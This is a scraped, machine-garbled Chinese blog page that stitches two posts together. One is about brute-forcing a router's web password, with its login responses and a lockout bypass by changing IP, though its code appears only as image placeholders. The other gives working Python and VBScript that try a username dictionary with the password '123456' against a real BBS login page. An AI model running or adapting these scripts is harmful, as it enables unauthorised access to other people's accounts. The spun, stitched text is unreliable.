行使PythonInfiniti爆破路由器密码, 限制错误次数? 对Python无用!

图片 1

莫非真的要本身破解1个么?算了,正好试试小编的Python水平。
python版

image

复制代码 代码如下:

在院子里面来看了二个没人用的路由器(ws860s),看起来像个黑科技(science and technology)的玩具,就想着进去看看,到底有啥样好玩的。看到后头的价签上有web界面包车型客车地方,然后登陆进去看看,发现有密码,然后笔者想,路由器的密码应该都以可以reset的,然后自个儿就用笔戳那3个reset键,神迹未有发生,原来那几个reset键坏了。

#coding: gbk
import httplib, urllib

图片 2

def Check(username, password):
params = urllib.urlencode(
{‘userid’: username, ‘passwd’: password})
headers = {“Content-type”:
“application/x-www-form-urlencoded”}
conn = httplib.HTTPSConnection(“www.bdwm.net”)
conn.request(“POST”,
“/bbs/bbslog2.php”, params, headers)
res = conn.getresponse().read()
conn.close()
if res.find(“密码不正确”) != -1:
return False
elif res.find(“不设有这一个用户”) != -1:
return False
else:
return True

image

for i in open(“English.Dic”):
if Check(i.rstrip(),”123456″):
print i

图片 3

顺手也写了个VBS版的,感觉相似VBS比较快,感觉出难点了?

image

复制代码 代码如下:

浅析进度

Dim fso
Set fso = CreateObject(“scripting.filesystemobject”)
With fso.OpenTextFile(“English.Dic”,1)
Do Until .AtEndOfStream
id = .ReadLine
If Check(id,”123456″) Then
WScript.Echo id & vbTab &”OK”
End If
Loop
End With

抓包

Function Check(username,password)
Dim http
Set http = CreateObject(“Msxml2.XMLHTTP”)
http.open _
“POST”,”https://www.bdwm.net/bbs/bbslog2.php",False
http.setRequestHeader _
“Content-Type”,”application/x-www-form-urlencoded”
http.send “userid=” & username & “&passwd=” & password
response = AnsiToUnicode(http.responseBody)
If InStr(response,”密码不科学”) Then
Check = False
ElseIf InStr(response,”不设有那几个用户”) Then
Check = False
Else
Check = True
End If
End Function

一、打开路由的web页面:192.16捌.三.一,路由器重临

Function AnsiToUnicode(str)
Dim ado
Set ado = CreateObject(“adodb.stream”)
ado.Type = 1
ado.Open
ado.Write str
ado.Position = 0
ado.Type = 2
ado.Charset = “gb2312”
AnsiToUnicode = ado.ReadText
End Function

图片 4

事实表明,12345陆真是3个强劲的密码。但愿深夜并未有警察五伯敲门。
原文:http://demon.tw/programming/python-a-little-trial.html

image

http://www.bkjia.com/Pythonjc/306570.htmlwww.bkjia.comtruehttp://www.bkjia.com/Pythonjc/306570.htmlTechArticle难道真的要我破解一个么?算了,正好试试我的Python水平。
python版 复制代码 代码如下: #coding: gbk import httplib, urllib def
Check(username, password)…

图片 5

image

会收获csrf和cookie和所必要的值,这几个值都要保留下来,后边会用。

二、输入用户名密码后:

图片 6

image

图片 7

image

图片 8

image

图片 9

image

三、路由器重临数据

图片 10

image

密码的变动方法

从地点抓包的结果来看,Password字段是通过加密的,所以如若大家要Python暴力破解,要求把那几个password的变迁算法找出来。

开辟web登录页面,查看源代码,找找算法

图片 11

image

图片 12

image

图片 13

image

图片 14

image

图片 15

image

在linux上修改ip地址,很简短一条命令就能够消除:

图片 16

image

[password:bbbbbbbb];{“errorCategory”:”user_pass_err”,”csrf_param”:”FcnG919l8J7XhQsOYQEMS3WhsC2liSX”,”count”:2,”csrf_token”:”IQ/LfSZSx7gTp6VflYnZelobNSpoMy2″}

ip地址被限制,须要等待壹分钟的升迁:

[password:aaaaaaaa];{“errorCategory”:”Three_time_err”,”csrf_param”:”VKGTylVILQA9SFsTyYdpkHv8qfJPIIw”,”count”:3,”csrf_token”:”MTQLBcWQN+1DJjAP+A6xC4AUSXciBod”}

签到成功的唤醒:

****[password:xxxxxxxx];{“csrf_param”:”H/DyWxogz7+2y4UfzhqddowkjH1uL04″,”csrf_token”:”MorgBb0+PNpoE8KhwBwq4OoioD2NcCs”,”errorCategory”:”ok”,”level”:2,”IsWizard”:true,”IsFirst”:true}

流程

图片 17

image

持有的数据都准备好了,下一步,正是开头应用Python写程序了。

核心Python代码:

图片 18

image

图片 19

image

图片 20

image

图片 21

image

图片 22

image

图片 23

image

图片 24

image

图片 25

image

图片 26

image

图片 27

image

图片 28

image

图片 29

image

图片 30

image

图片 31

image

图片 32

image

怎么幸免暴力破解?

图片 33

image

图片 34

发表评论

电子邮件地址不会被公开。 必填项已用*标注

网站地图xml地图